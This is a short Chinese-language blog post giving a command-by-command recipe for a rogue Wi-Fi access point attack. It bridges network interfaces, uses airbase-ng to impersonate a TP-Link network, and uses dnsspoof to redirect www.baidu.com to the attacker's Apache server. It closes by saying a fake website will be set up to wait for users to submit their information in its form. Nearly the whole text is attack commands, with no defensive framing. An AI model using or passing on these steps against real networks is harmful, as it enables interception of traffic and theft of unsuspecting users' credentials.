僞造無線AP熱點流程,DNS劫持

第一步:進入Monitor 模式(前面幾篇文章有說明)

第二步:僞造AP:

安裝無線網卡橋接包   apt-get install bridge-utils

添加網橋   brctl addbr bridge

先把連接網絡的網卡添加到網橋裏面 brctl addif bridge eth0  #eth0 是已經連接網絡的網卡,可以是有線網卡或者無線網卡

把自己僞造AP的無線網卡添加到網橋裏面 brctl addif bridge at0 #at0 僞造AP的無線網卡

清除網卡的IP地址  ifconfig eth0 0.0.0.0 up 

清除AP網卡的IP地址  ifconfig at0 0.0.0.0 up 

給橋接接口分配IP地址  ifconfig bridge 192.168.1.10 up

添加網關 route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1

啓動IP轉發 echo 1 > /proc/sys/net/ipv4/ip_forward

進行AP僞造:airbase-ng -c 11 --essid TP_LINK722 wla0mon  # -c 指定信道  --essid 要僞造成的AP  wlan0mon 使用的網卡

第三步:DNS欺騙

dnsspoof -i bridge -f dnsspoof.hosts  #-i 使用欺騙的網橋 -f 進行欺騙 域名網址配置文件(該配置文件的格式可以參考

/usr/share/dsniff/dnsspoof.hosts) 例如: 192.168.1.110    www.baidu.com 把訪問百度的請求轉向本機僞造的地址

然後啓動apach服務   apachet2ctl start 

下面步驟就要僞造自己想要的網站,等用戶填寫信息提交表單:

 

 

 

 

 

發佈了38 篇原創文章 · 獲贊 10 · 訪問量 9萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章